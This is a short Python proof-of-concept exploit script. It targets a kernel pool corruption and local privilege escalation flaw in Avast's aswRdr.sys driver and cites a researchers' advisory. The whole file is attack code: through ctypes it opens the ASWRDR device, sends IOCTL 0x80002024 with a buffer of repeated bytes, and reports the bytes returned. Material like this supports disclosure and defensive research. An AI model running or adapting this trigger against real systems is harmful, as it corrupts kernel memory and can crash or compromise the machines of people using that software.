#!/usr/bin/python
#Found by AbdulAziz Hariri and Giuseppe 'Evilcry' Bonfa' (www.EvilFingers.com)
#Original advisory:
#https://www.evilfingers.com/advisory/Advisory/Avast_aswRdr_sys_Kernel_Pool_Corruption_and_Local_Privilege_Escalation.php

import sys,os

from ctypes import *

kernel32=windll.kernel32

GENERIC_READ=0x80000000
GENERIC_WRITE=0x40000000
OPEN_EXISTING=0x3

device_name='\\Device\\ASWRDR'
ioctl_code=int('80002024',16)

dev="\\\\.\\ASWRDR"
driver_handle=kernel32.CreateFileW(dev,GENERIC_READ|GENERIC_WRITE,0,None,OPEN_EXISTING,0,None)
print "\t[x] w00t Fuzz!"
current_length=int(342)
in_buffer = "\x3f"*current_length
full_length = int(1342)
out_buf = (c_char * current_length)()
bytes_returned = c_ulong(current_length)
kernel32.DeviceIoControl(driver_handle,ioctl_code,in_buffer,current_length,byref(out_buf),current_length,byref(bytes_returned),None)
print "\t[x] Bytes returned %d." % bytes_returned.value
kernel32.CloseHandle(driver_handle)